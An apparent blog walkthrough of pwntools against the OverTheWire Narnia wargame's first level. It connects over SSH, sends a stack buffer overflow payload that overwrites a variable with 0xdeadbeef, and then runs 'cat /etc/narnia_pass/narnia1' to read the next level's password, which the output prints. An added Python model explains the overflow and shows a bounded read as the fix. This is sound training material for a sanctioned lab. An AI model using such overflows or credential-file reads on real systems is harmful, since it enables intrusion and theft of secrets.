First experience with pwntools
Source: Internet  Published by: Software Testing Basic Methods  Editor: 程序博客网  Time: 2024/06/01 09:21
```
Python 2.7.12 (default, Sep 28 2016, 18:41:32)
[GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.38)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> help(context)
>>> context(arch='i386', os='linux')
>>> s = ssh(user='narnia0', host='narnia.labs.overthewire.org', password='narnia0')
[x] Connecting to narnia.labs.overthewire.org on port 22
[+] Connecting to narnia.labs.overthewire.org on port 22: Done
[ERROR] Could not find 'objcopy' installed for ContextType(arch = 'i386', aslr = True, bits = 32, endian = 'little', log_level = 40, os = 'linux')
Try installing binutils for this architecture:
https://docs.pwntools.com/en/stable/install/binutils.html
[*] narnia0@narnia.labs.overthewire.org:
Distro Ubuntu 14.04
OS: linux
Arch: amd64
Version: 4.8.6
ASLR: Disabled
>>> sh = s.run('pwd')
[x] Opening new channel: 'pwd'
[+] Opening new channel: 'pwd': Done
>>> print sh
>>> sh = s.run('ls')
[x] Opening new channel: 'ls'
[+] Opening new channel: 'ls': Done
>>> exit()
[*] Closed SSH channel with narnia.labs.overthewire.org
[*] Closed SSH channel with narnia.labs.overthewire.org
```
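Of course, simply exiting Python as above, and letting that stand in for closing the SSH connection, is a bit crude.
Here is a more polite way.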
```
➜ Narnia git:(master) python [21:36:07]
Python 2.7.12 (default, Sep 28 2016, 18:41:32)
[GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.38)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> context(arch='i386', os='linux')
>>> s = ssh(user='narnia0', host='narnia.labs.overthewire.org', password='narnia0')
[x] Connecting to narnia.labs.overthewire.org on port 22
[+] Connecting to narnia.labs.overthewire.org on port 22: Done
[ERROR] Could not find 'objcopy' installed for ContextType(arch = 'i386', aslr = True, bits = 32, endian = 'little', log_level = 40, os = 'linux')
Try installing binutils for this architecture:
https://docs.pwntools.com/en/stable/install/binutils.html
[*] narnia0@narnia.labs.overthewire.org:
Distro Ubuntu 14.04
OS: linux
Arch: amd64
Version: 4.8.6
ASLR: Disabled
>>> sh = s.run('/narnia/narnia0')
[x] Opening new channel: '/narnia/narnia0'
[+] Opening new channel: '/narnia/narnia0': Done
>>> sh.sendline('A'*20 + p32(0xdeadbeef))
>>> sh.sendline('cat /etc/narnia_pass/narnia1')
>>> print sh.recvline()
Correct val's value from 0x41414141 -> 0xdeadbeef!
>>> print sh.recvline()
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ�
>>> print sh.recvline()
val: 0xdeadbeef
>>> print sh.recvline()
$ efeidiedae
>>> s.close()
[*] Closed connection to 'narnia.labs.overthewire.org'
>>> exit()
[*] Closed SSH channel with narnia.labs.overthewire.org
[*] Closed SSH channel with narnia.labs.overthewire.org
```
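It feels like this way there is none of the input lag you get when typing in an SSH session in the terminal?
It also makes it easy to do other things in the same terminal at the same time.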
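Why `'A'*20 + p32(0xdeadbeef)` changes `val` in the second session, and why the `buf:` line ends in unprintable bytes, shown as an added Python 3 model (not code from the original post). It assumes a 20-byte `buf` directly followed by `val` and a read width of 24 bytes; `p32_le`, `build_payload` and `simulate_read` are names made up for this example.

```python
import struct

BUF_SIZE = 20             # assumed: buf is 20 bytes, matching 'A'*20 in the session
INITIAL_VAL = 0x41414141  # starting value printed by the target


def p32_le(value):
    """Pack a 32-bit value little-endian, the bytes p32() gives for i386."""
    return struct.pack("<I", value)


def build_payload(target):
    """Filler up to the end of buf, then the bytes that land in val."""
    return b"A" * BUF_SIZE + p32_le(target)


def simulate_read(data, max_width):
    """Model a string read of at most max_width bytes into buf.

    The frame is buf[20] immediately followed by a 32-bit val (assumed layout).
    Returns (bytes a %s print of buf would show, resulting val).
    """
    frame = bytearray(BUF_SIZE) + bytearray(p32_le(INITIAL_VAL))
    token = data[:max_width]
    frame[:len(token)] = token
    if len(token) < len(frame):
        frame[len(token)] = 0  # NUL terminator written after the token
    val = struct.unpack_from("<I", frame, BUF_SIZE)[0]
    shown = bytes(frame).split(b"\x00")[0]
    return shown, val


if __name__ == "__main__":
    payload = build_payload(0xDEADBEEF)
    for width in (24, 19):  # 24 overruns buf by 4 bytes; 19 leaves room for the NUL
        shown, val = simulate_read(payload, width)
        print("width=%d buf=%r val=0x%08x" % (width, shown, val))
```

With a width of 19 the input and its terminator stay inside `buf`, so `val` keeps its initial value; that bound is the fix on the target side.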